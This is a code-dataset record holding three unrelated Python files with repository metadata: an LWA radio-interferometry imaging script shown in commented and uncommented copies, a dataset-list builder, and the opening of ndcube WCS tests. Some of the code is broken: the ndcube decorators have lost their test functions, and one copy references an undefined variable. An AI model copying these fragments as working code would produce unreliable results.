765339d4fc4652eb9c074cc80533af5039fad69c | 8,884 | py | Python | main/interferometer_testing_LWA.py | nithyanandan/MOFF | c2bd68b792a5269cfffe1d93b4710eae9ba8ca55 | [
"MIT"
] | 3 | 2019-12-11T07:14:10.000Z | 2020-11-07T19:25:32.000Z | main/interferometer_testing_LWA.py | nithyanandan/MOFF | c2bd68b792a5269cfffe1d93b4710eae9ba8ca55 | [
"MIT"
] | 8 | 2015-08-20T19:46:29.000Z | 2015-09-19T01:31:43.000Z | main/interferometer_testing_LWA.py | epic-astronomy/EPIC | c2bd68b792a5269cfffe1d93b4710eae9ba8ca55 | [
"MIT"
] | 1 | 2019-09-24T19:05:34.000Z | 2019-09-24T19:05:34.000Z | import datetime as DT
import numpy as NP
import matplotlib.pyplot as PLT
import matplotlib.colors as PLTC
import scipy.constants as FCNST
from astropy.io import fits
from astropy.io import ascii
from astropy.table import Table
import progressbar as PGB
import antenna_array as AA
import geometry as GEOM
import my_DSP_modules as DSP
import sim_observe as SIM
import ipdb as PDB
# --- Input data: reformatted LWA voltage dumps, one FITS file per polarization.
LWA_reformatted_datafile_prefix = '/data3/t_nithyanandan/project_MOFF/data/samples/lwa_reformatted_data_test'
LWA_pol0_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-0.fits'
LWA_pol1_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-1.fits'
# Number of timestamps to image; None means "use all available" (clipped below).
max_n_timestamps = 9
hdulist0 = fits.open(LWA_pol0_reformatted_datafile)
hdulist1 = fits.open(LWA_pol1_reformatted_datafile)
extnames = [h.header['EXTNAME'] for h in hdulist0]
# Observing parameters from the pol-0 primary header (assumed to match pol-1
# -- TODO confirm the two files share identical headers).
lat = hdulist0['PRIMARY'].header['latitude']
f0 = hdulist0['PRIMARY'].header['center_freq']
nchan = hdulist0['PRIMARY'].header['nchan']
dt = 1.0 / hdulist0['PRIMARY'].header['sample_rate']
freqs = hdulist0['freqs'].data
channel_width = freqs[1] - freqs[0]
f_center = f0
# NOTE(review): bchan/echan (band-edge channel indices, presumably) are not
# used in the visible portion of this script.
bchan = 63
echan = 963
# Select the "core" stands inside a square of half-width max_antenna_radius.
max_antenna_radius = 40.0 # in meters
# max_antenna_radius = 75.0 # in meters
antid = hdulist0['Antenna Positions'].data['Antenna']
antpos = hdulist0['Antenna Positions'].data['Position']
# antpos -= NP.mean(antpos, axis=0).reshape(1,-1)
core_ind = NP.logical_and((NP.abs(antpos[:,0]) < max_antenna_radius), (NP.abs(antpos[:,1]) < max_antenna_radius))
# core_ind = NP.logical_and((NP.abs(antpos[:,0]) <= NP.max(NP.abs(antpos[:,0]))), (NP.abs(antpos[:,1]) < NP.max(NP.abs(antpos[:,1]))))
# ant_info rows: [antenna id, x, y, z] for the selected core stands.
ant_info = NP.hstack((antid[core_ind].reshape(-1,1), antpos[core_ind,:]))
n_antennas = ant_info.shape[0]
# Build one Antenna object per selected stand and accumulate into the array.
ants = []
aar = AA.AntennaArray()
for i in xrange(n_antennas):
    ant = AA.Antenna('{0:0d}'.format(int(ant_info[i,0])), lat, ant_info[i,1:], f0, nsamples=nchan)
    # Frequency axis for the antenna spectrum (fftshifted, centered on f0).
    ant.f = ant.f0 + DSP.spectax(2*nchan, dt, shift=True)
    ants += [ant]
    aar = aar + ant
timestamps = hdulist0['TIMESTAMPS'].data['timestamp']
# Clip the requested number of timestamps to what the data actually contains.
if max_n_timestamps is None:
    max_n_timestamps = len(timestamps)
else:
    max_n_timestamps = min(max_n_timestamps, len(timestamps))
timestamps = timestamps[:max_n_timestamps]
# Per-stand cable delays from a text table (columns: stand id, delay --
# units presumably seconds; TODO confirm against the data file header).
stand_cable_delays = NP.loadtxt('/data3/t_nithyanandan/project_MOFF/data/samples/cable_delays.txt', skiprows=1)
antennas = stand_cable_delays[:,0].astype(NP.int).astype(str)
cable_delays = stand_cable_delays[:,1]
# Form all antenna pairs (FX interferometer array) and set up the uv-grid.
iar = AA.InterferometerArray(antenna_array=aar)
iar.grid()
count = 0
# Main loop: for each timestamp, load both polarizations of every antenna's
# voltage stream, apply cable delays, cross-correlate (FX), grid the
# visibilities, image, and accumulate the 'P11' dirty image for averaging.
for i in xrange(max_n_timestamps):
    timestamp = timestamps[i]
    # Per-timestamp update payload for the antenna array: one dict per antenna.
    antenna_level_update_info = {}
    antenna_level_update_info['antenna_array'] = {}
    antenna_level_update_info['antenna_array']['timestamp'] = timestamp
    antenna_level_update_info['antennas'] = []
    for label in iar.antenna_array.antennas:
        adict = {}
        adict['label'] = label
        adict['action'] = 'modify'
        adict['timestamp'] = timestamp
        adict['Et'] = {}
        adict['flags'] = {}
        adict['delaydict'] = {}
        # Pol P1: a FITS column named after the antenna holds (real, imag)
        # voltage samples; antennas absent from this timestamp are flagged.
        if label in hdulist0[timestamp].columns.names:
            adict['t'] = NP.arange(nchan) * dt
            Et_P1 = hdulist0[timestamp].data[label]
            adict['Et']['P1'] = Et_P1[:,0] + 1j * Et_P1[:,1]
            adict['flags']['P1'] = False
            # adict['gridfunc_freq'] = 'scale'
            # adict['wtsinfo_P1'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
            # adict['gridmethod'] = 'NN'
            # adict['distNN'] = 0.5 * FCNST.c / f0
            # adict['tol'] = 1.0e-6
            # adict['maxmatch'] = 1
            adict['delaydict']['P1'] = {}
            adict['delaydict']['P1']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency']
            # adict['delaydict_P1']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label]
            adict['delaydict']['P1']['delays'] = cable_delays[antennas == label]
            adict['delaydict']['P1']['fftshifted'] = True
        else:
            adict['flags']['P1'] = True
        # Pol P2: same treatment, read from the second (pol-1) FITS file.
        if label in hdulist1[timestamp].columns.names:
            adict['t'] = NP.arange(nchan) * dt
            Et_P2 = hdulist1[timestamp].data[label]
            adict['Et']['P2'] = Et_P2[:,0] + 1j * Et_P2[:,1]
            adict['flags']['P2'] = False
            # adict['gridfunc_freq'] = 'scale'
            # adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
            # adict['gridmethod'] = 'NN'
            # adict['distNN'] = 0.5 * FCNST.c / f0
            # adict['tol'] = 1.0e-6
            # adict['maxmatch'] = 1
            adict['delaydict']['P2'] = {}
            adict['delaydict']['P2']['frequencies'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data['frequency']
            # adict['delaydict_P2']['delays'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data[label]
            adict['delaydict']['P2']['delays'] = cable_delays[antennas == label]
            adict['delaydict']['P2']['fftshifted'] = True
        else:
            adict['flags']['P2'] = True
        antenna_level_update_info['antennas'] += [adict]
        # if label in hdulist1[timestamp].columns.names:
        # adict['t'] = NP.arange(nchan) * dt
        # Et_P2 = hdulist1[timestamp].data[label]
        # adict['Et_P2'] = Et_P2[:,0] + 1j * Et_P2[:,1]
        # adict['flag_P2'] = False
        # # adict['gridfunc_freq'] = 'scale'
        # # adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
        # # adict['gridmethod'] = 'NN'
        # # adict['distNN'] = 0.5 * FCNST.c / f0
        # # adict['tol'] = 1.0e-6
        # # adict['maxmatch'] = 1
        # adict['delaydict_P2'] = {}
        # adict['delaydict_P2']['pol'] = 'P2'
        # adict['delaydict_P2']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency']
        # # adict['delaydict_P2']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label]
        # adict['delaydict_P2']['delays'] = cable_delays[antennas == label]
        # adict['delaydict_P2']['fftshifted'] = True
        # else:
        # adict['flag_P2'] = True
    # Per-timestamp update payload for the interferometers: identical gridding
    # parameters and illumination-lookup weights for all four polarizations.
    interferometer_level_update_info = {}
    interferometer_level_update_info['interferometers'] = []
    for label in iar.interferometers:
        idict = {}
        idict['label'] = label
        idict['action'] = 'modify'
        idict['gridfunc_freq'] = 'scale'
        idict['gridmethod'] = 'NN'
        idict['distNN'] = 0.5 * FCNST.c / f0
        idict['tol'] = 1.0e-6
        idict['maxmatch'] = 1
        idict['wtsinfo'] = {}
        for pol in ['P11', 'P12', 'P21', 'P22']:
            idict['wtsinfo'][pol] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
        interferometer_level_update_info['interferometers'] += [idict]
    # Push the updates and cross-correlate (FX), then grid and image 'P11'.
    iar.update(antenna_level_updates=antenna_level_update_info, interferometer_level_updates=interferometer_level_update_info, do_correlate='FX', parallel=True, verbose=True)
    iar.grid_convolve(pol='P11', method='NN', distNN=0.5*FCNST.c/f0, tol=1.0e-6, maxmatch=1, identical_interferometers=True, gridfunc_freq='scale', mapping='weighted', wts_change=False, parallel=True, pp_method='queue')
    imgobj = AA.NewImage(interferometer_array=iar, pol='P11')
    imgobj.imagr(weighting='natural', pol='P11')
    # Accumulate the per-timestamp dirty images (normalized after the loop).
    if i == 0:
        avg_img = imgobj.img['P11']
    else:
        avg_img += imgobj.img['P11']
# Normalize the accumulated image into a time-average over the processed
# timestamps, then plot the frequency-averaged dirty image on the (l, m)
# direction-cosine grid and save it to disk.
avg_img /= max_n_timestamps
fig = PLT.figure()
ax = fig.add_subplot(111)
imgplot = ax.imshow(NP.mean(avg_img, axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max()))
# posplot, = ax.plot(skypos[:,0], skypos[:,1], 'o', mfc='none', mec='black', mew=1, ms=8)
ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max())
ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max())
PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_sample_image_{0:0d}_iterations.png'.format(max_n_timestamps), bbox_inches=0)
# NOTE(review): interactive debugger breakpoint left in -- execution halts here
# until the user continues; remove for unattended runs.
PDB.set_trace()
PLT.close(fig)
# Plot and save the frequency-averaged synthesized beam (PSF) for 'P11' on the
# same (l, m) direction-cosine grid as the image above.
fig = PLT.figure()
ax = fig.add_subplot(111)
imgplot = ax.imshow(NP.mean(imgobj.beam['P11'], axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max()))
ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max())
ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max())
# Bug fix: the original line called '...FX_LWA_psf.png'.format(itr), but `itr`
# is never defined in this script (copied from a looped variant) and the string
# has no placeholder, so evaluating it raised a NameError before saving.
PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_psf.png', bbox_inches=0)
PLT.close(fig)
| 46.757895 | 219 | 0.647794 | import datetime as DT
import numpy as NP
import matplotlib.pyplot as PLT
import matplotlib.colors as PLTC
import scipy.constants as FCNST
from astropy.io import fits
from astropy.io import ascii
from astropy.table import Table
import progressbar as PGB
import antenna_array as AA
import geometry as GEOM
import my_DSP_modules as DSP
import sim_observe as SIM
import ipdb as PDB
LWA_reformatted_datafile_prefix = '/data3/t_nithyanandan/project_MOFF/data/samples/lwa_reformatted_data_test'
LWA_pol0_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-0.fits'
LWA_pol1_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-1.fits'
max_n_timestamps = 9
hdulist0 = fits.open(LWA_pol0_reformatted_datafile)
hdulist1 = fits.open(LWA_pol1_reformatted_datafile)
extnames = [h.header['EXTNAME'] for h in hdulist0]
lat = hdulist0['PRIMARY'].header['latitude']
f0 = hdulist0['PRIMARY'].header['center_freq']
nchan = hdulist0['PRIMARY'].header['nchan']
dt = 1.0 / hdulist0['PRIMARY'].header['sample_rate']
freqs = hdulist0['freqs'].data
channel_width = freqs[1] - freqs[0]
f_center = f0
bchan = 63
echan = 963
max_antenna_radius = 40.0 # in meters
# max_antenna_radius = 75.0 # in meters
antid = hdulist0['Antenna Positions'].data['Antenna']
antpos = hdulist0['Antenna Positions'].data['Position']
# antpos -= NP.mean(antpos, axis=0).reshape(1,-1)
core_ind = NP.logical_and((NP.abs(antpos[:,0]) < max_antenna_radius), (NP.abs(antpos[:,1]) < max_antenna_radius))
# core_ind = NP.logical_and((NP.abs(antpos[:,0]) <= NP.max(NP.abs(antpos[:,0]))), (NP.abs(antpos[:,1]) < NP.max(NP.abs(antpos[:,1]))))
ant_info = NP.hstack((antid[core_ind].reshape(-1,1), antpos[core_ind,:]))
n_antennas = ant_info.shape[0]
ants = []
aar = AA.AntennaArray()
for i in xrange(n_antennas):
ant = AA.Antenna('{0:0d}'.format(int(ant_info[i,0])), lat, ant_info[i,1:], f0, nsamples=nchan)
ant.f = ant.f0 + DSP.spectax(2*nchan, dt, shift=True)
ants += [ant]
aar = aar + ant
timestamps = hdulist0['TIMESTAMPS'].data['timestamp']
if max_n_timestamps is None:
max_n_timestamps = len(timestamps)
else:
max_n_timestamps = min(max_n_timestamps, len(timestamps))
timestamps = timestamps[:max_n_timestamps]
stand_cable_delays = NP.loadtxt('/data3/t_nithyanandan/project_MOFF/data/samples/cable_delays.txt', skiprows=1)
antennas = stand_cable_delays[:,0].astype(NP.int).astype(str)
cable_delays = stand_cable_delays[:,1]
iar = AA.InterferometerArray(antenna_array=aar)
iar.grid()
count = 0
for i in xrange(max_n_timestamps):
timestamp = timestamps[i]
antenna_level_update_info = {}
antenna_level_update_info['antenna_array'] = {}
antenna_level_update_info['antenna_array']['timestamp'] = timestamp
antenna_level_update_info['antennas'] = []
for label in iar.antenna_array.antennas:
adict = {}
adict['label'] = label
adict['action'] = 'modify'
adict['timestamp'] = timestamp
adict['Et'] = {}
adict['flags'] = {}
adict['delaydict'] = {}
if label in hdulist0[timestamp].columns.names:
adict['t'] = NP.arange(nchan) * dt
Et_P1 = hdulist0[timestamp].data[label]
adict['Et']['P1'] = Et_P1[:,0] + 1j * Et_P1[:,1]
adict['flags']['P1'] = False
# adict['gridfunc_freq'] = 'scale'
# adict['wtsinfo_P1'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# adict['gridmethod'] = 'NN'
# adict['distNN'] = 0.5 * FCNST.c / f0
# adict['tol'] = 1.0e-6
# adict['maxmatch'] = 1
adict['delaydict']['P1'] = {}
adict['delaydict']['P1']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# adict['delaydict_P1']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label]
adict['delaydict']['P1']['delays'] = cable_delays[antennas == label]
adict['delaydict']['P1']['fftshifted'] = True
else:
adict['flags']['P1'] = True
if label in hdulist1[timestamp].columns.names:
adict['t'] = NP.arange(nchan) * dt
Et_P2 = hdulist1[timestamp].data[label]
adict['Et']['P2'] = Et_P2[:,0] + 1j * Et_P2[:,1]
adict['flags']['P2'] = False
# adict['gridfunc_freq'] = 'scale'
# adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# adict['gridmethod'] = 'NN'
# adict['distNN'] = 0.5 * FCNST.c / f0
# adict['tol'] = 1.0e-6
# adict['maxmatch'] = 1
adict['delaydict']['P2'] = {}
adict['delaydict']['P2']['frequencies'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# adict['delaydict_P2']['delays'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data[label]
adict['delaydict']['P2']['delays'] = cable_delays[antennas == label]
adict['delaydict']['P2']['fftshifted'] = True
else:
adict['flags']['P2'] = True
antenna_level_update_info['antennas'] += [adict]
# if label in hdulist1[timestamp].columns.names:
# adict['t'] = NP.arange(nchan) * dt
# Et_P2 = hdulist1[timestamp].data[label]
# adict['Et_P2'] = Et_P2[:,0] + 1j * Et_P2[:,1]
# adict['flag_P2'] = False
# # adict['gridfunc_freq'] = 'scale'
# # adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# # adict['gridmethod'] = 'NN'
# # adict['distNN'] = 0.5 * FCNST.c / f0
# # adict['tol'] = 1.0e-6
# # adict['maxmatch'] = 1
# adict['delaydict_P2'] = {}
# adict['delaydict_P2']['pol'] = 'P2'
# adict['delaydict_P2']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# # adict['delaydict_P2']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label]
# adict['delaydict_P2']['delays'] = cable_delays[antennas == label]
# adict['delaydict_P2']['fftshifted'] = True
# else:
# adict['flag_P2'] = True
interferometer_level_update_info = {}
interferometer_level_update_info['interferometers'] = []
for label in iar.interferometers:
idict = {}
idict['label'] = label
idict['action'] = 'modify'
idict['gridfunc_freq'] = 'scale'
idict['gridmethod'] = 'NN'
idict['distNN'] = 0.5 * FCNST.c / f0
idict['tol'] = 1.0e-6
idict['maxmatch'] = 1
idict['wtsinfo'] = {}
for pol in ['P11', 'P12', 'P21', 'P22']:
idict['wtsinfo'][pol] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
interferometer_level_update_info['interferometers'] += [idict]
iar.update(antenna_level_updates=antenna_level_update_info, interferometer_level_updates=interferometer_level_update_info, do_correlate='FX', parallel=True, verbose=True)
iar.grid_convolve(pol='P11', method='NN', distNN=0.5*FCNST.c/f0, tol=1.0e-6, maxmatch=1, identical_interferometers=True, gridfunc_freq='scale', mapping='weighted', wts_change=False, parallel=True, pp_method='queue')
imgobj = AA.NewImage(interferometer_array=iar, pol='P11')
imgobj.imagr(weighting='natural', pol='P11')
if i == 0:
avg_img = imgobj.img['P11']
else:
avg_img += imgobj.img['P11']
avg_img /= max_n_timestamps
fig = PLT.figure()
ax = fig.add_subplot(111)
imgplot = ax.imshow(NP.mean(avg_img, axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max()))
# posplot, = ax.plot(skypos[:,0], skypos[:,1], 'o', mfc='none', mec='black', mew=1, ms=8)
ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max())
ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max())
PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_sample_image_{0:0d}_iterations.png'.format(max_n_timestamps), bbox_inches=0)
PDB.set_trace()
PLT.close(fig)
fig = PLT.figure()
ax = fig.add_subplot(111)
imgplot = ax.imshow(NP.mean(imgobj.beam['P11'], axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max()))
ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max())
ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max())
PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_psf.png'.format(itr), bbox_inches=0)
PLT.close(fig)
| 0 | 0 | 0 |
eb9a9f1b47b096471f29f1f8404752392820034c | 1,220 | py | Python | convert_to_list.py | HimanchalChandra/visual-relationship-detection | 74922fbb8a3dc1a15b539a7178acb48256f3ad0c | [
"Apache-2.0"
] | 2 | 2021-04-16T08:33:24.000Z | 2021-10-15T12:21:53.000Z | convert_to_list.py | HimanchalChandra/visual-relationship-detection | 74922fbb8a3dc1a15b539a7178acb48256f3ad0c | [
"Apache-2.0"
] | null | null | null | convert_to_list.py | HimanchalChandra/visual-relationship-detection | 74922fbb8a3dc1a15b539a7178acb48256f3ad0c | [
"Apache-2.0"
] | null | null | null | import json
import os
from opts import parse_opts
opt = parse_opts()
# prepare train.txt
with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_train.json'), 'r') as f:
annotations = json.load(f)
sg_train_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_train_images'))
sg_test_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_test_images'))
annotations_copy = annotations.copy()
for ann in annotations.items():
if(not annotations[ann[0]] or ann[0] not in sg_train_images):
annotations_copy.pop(ann[0])
with open(os.path.join(opt.dataset_path, 'train.txt'),'a') as f:
for ann in annotations_copy.items():
f.write(ann[0])
f.write('\n')
# prepare test.txt
with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_test.json'), 'r') as f:
annotations = json.load(f)
annotations_copy = annotations.copy()
for ann in annotations.items():
if(not annotations[ann[0]] or ann[0] not in sg_test_images):
annotations_copy.pop(ann[0])
with open(os.path.join(opt.dataset_path, 'test.txt'),'a') as f:
for ann in annotations_copy.items():
f.write(ann[0])
f.write('\n')
| 27.727273 | 93 | 0.686066 | import json
import os
from opts import parse_opts
opt = parse_opts()
# prepare train.txt
with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_train.json'), 'r') as f:
annotations = json.load(f)
sg_train_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_train_images'))
sg_test_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_test_images'))
annotations_copy = annotations.copy()
for ann in annotations.items():
if(not annotations[ann[0]] or ann[0] not in sg_train_images):
annotations_copy.pop(ann[0])
with open(os.path.join(opt.dataset_path, 'train.txt'),'a') as f:
for ann in annotations_copy.items():
f.write(ann[0])
f.write('\n')
# prepare test.txt
with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_test.json'), 'r') as f:
annotations = json.load(f)
annotations_copy = annotations.copy()
for ann in annotations.items():
if(not annotations[ann[0]] or ann[0] not in sg_test_images):
annotations_copy.pop(ann[0])
with open(os.path.join(opt.dataset_path, 'test.txt'),'a') as f:
for ann in annotations_copy.items():
f.write(ann[0])
f.write('\n')
| 0 | 0 | 0 |
f62dc224cc333347c997eb5e3bac4a133452c4ee | 4,528 | py | Python | ndcube/tests/test_utils_wcs.py | BaptistePellorceAstro/ndcube | eaa2841a6bf90ac2fb2f901747c9a297c0810862 | [
"BSD-2-Clause"
] | null | null | null | ndcube/tests/test_utils_wcs.py | BaptistePellorceAstro/ndcube | eaa2841a6bf90ac2fb2f901747c9a297c0810862 | [
"BSD-2-Clause"
] | null | null | null | ndcube/tests/test_utils_wcs.py | BaptistePellorceAstro/ndcube | eaa2841a6bf90ac2fb2f901747c9a297c0810862 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import pytest
import unittest
import numpy as np
import astropy.wcs
from ndcube import utils
from ndcube.tests import helpers
ht = {'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2,
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0,
'NAXIS2': 3,
'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4}
wt = utils.wcs.WCS(header=ht, naxis=3)
ht_with_celestial = {
'CTYPE4': 'HPLN-TAN', 'CUNIT4': 'deg', 'CDELT4': 1, 'CRPIX4': 0, 'CRVAL4': 0, 'NAXIS4': 1,
'CNAME4': 'redundant axis', 'CROTA4': 0,
'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2,
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0,
'NAXIS2': 3,
'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4}
hm = {'CTYPE1': 'WAVE ', 'CUNIT1': 'Angstrom', 'CDELT1': 0.2, 'CRPIX1': 0, 'CRVAL1': 10,
'NAXIS1': 4,
'CTYPE2': 'HPLT-TAN', 'CUNIT2': 'deg', 'CDELT2': 0.5, 'CRPIX2': 2, 'CRVAL2': 0.5,
'NAXIS2': 3,
'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2}
wm = utils.wcs.WCS(header=hm, naxis=3)
hm_reindexed_102 = {
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 10,
'NAXIS2': 4,
'CTYPE1': 'HPLT-TAN', 'CUNIT1': 'deg', 'CDELT1': 0.5, 'CRPIX1': 2, 'CRVAL1': 0.5, 'NAXIS1': 3,
'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2}
wm_reindexed_102 = utils.wcs.WCS(header=hm_reindexed_102, naxis=3)
@pytest.mark.parametrize("test_input,expected", [(ht, True), (hm, False)])
@pytest.mark.parametrize("test_input,expected", [((ht, 3), ht_with_celestial)])
@pytest.mark.parametrize(
"test_input,expected",
[({}, False),
([slice(1, 5), slice(-1, -5, -2)], True)])
@pytest.mark.parametrize(
"test_input,expected",
[({}, []),
((slice(1, 2), slice(1, 3), 2, slice(2, 4), 8),
[slice(1, 2, None), slice(1, 3, None), slice(2, 3, None),
slice(2, 4, None), slice(8, 9, None)])])
@pytest.mark.parametrize("test_input,expected", [
((wm, np.array([1, 0, 2])), wm_reindexed_102),
((wm, np.array([1, 0, -1])), wm_reindexed_102)
])
@pytest.mark.parametrize("test_input", [
(TypeError, wm, 0),
(TypeError, wm, np.array(['spam', 'eggs', 'ham'])),
])
@pytest.mark.parametrize("test_input,expected", [
((wm, 0, [False, False, False]), (0, 1)),
((wm, 1, [False, False, False]), (0, 1)),
((wm, 2, [False, False, False]), (2,)),
((wm, 1, [False, False, True]), (1,))
])
@pytest.mark.parametrize("test_input,expected", [
((wm, 0), (0,)),
((wm, 1), (1, 2)),
((wm, 2), (1, 2)),
])
@pytest.mark.parametrize("test_input,expected", [
(wm, np.array([[True, False, False], [False, True, True], [False, True, True]])),
(wt, np.array([[True, False, False, False], [False, True, False, False],
[False, False, True, True], [False, False, True, True]])),
(wm_reindexed_102, np.array([[True, False, True], [False, True, False],
[True, False, True]]))
])
| 38.05042 | 98 | 0.612633 | # -*- coding: utf-8 -*-
import pytest
import unittest
import numpy as np
import astropy.wcs
from ndcube import utils
from ndcube.tests import helpers
ht = {'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2,
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0,
'NAXIS2': 3,
'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4}
wt = utils.wcs.WCS(header=ht, naxis=3)
ht_with_celestial = {
'CTYPE4': 'HPLN-TAN', 'CUNIT4': 'deg', 'CDELT4': 1, 'CRPIX4': 0, 'CRVAL4': 0, 'NAXIS4': 1,
'CNAME4': 'redundant axis', 'CROTA4': 0,
'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2,
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0,
'NAXIS2': 3,
'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4}
hm = {'CTYPE1': 'WAVE ', 'CUNIT1': 'Angstrom', 'CDELT1': 0.2, 'CRPIX1': 0, 'CRVAL1': 10,
'NAXIS1': 4,
'CTYPE2': 'HPLT-TAN', 'CUNIT2': 'deg', 'CDELT2': 0.5, 'CRPIX2': 2, 'CRVAL2': 0.5,
'NAXIS2': 3,
'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2}
wm = utils.wcs.WCS(header=hm, naxis=3)
hm_reindexed_102 = {
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 10,
'NAXIS2': 4,
'CTYPE1': 'HPLT-TAN', 'CUNIT1': 'deg', 'CDELT1': 0.5, 'CRPIX1': 2, 'CRVAL1': 0.5, 'NAXIS1': 3,
'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2}
wm_reindexed_102 = utils.wcs.WCS(header=hm_reindexed_102, naxis=3)
@pytest.mark.parametrize("test_input,expected", [(ht, True), (hm, False)])
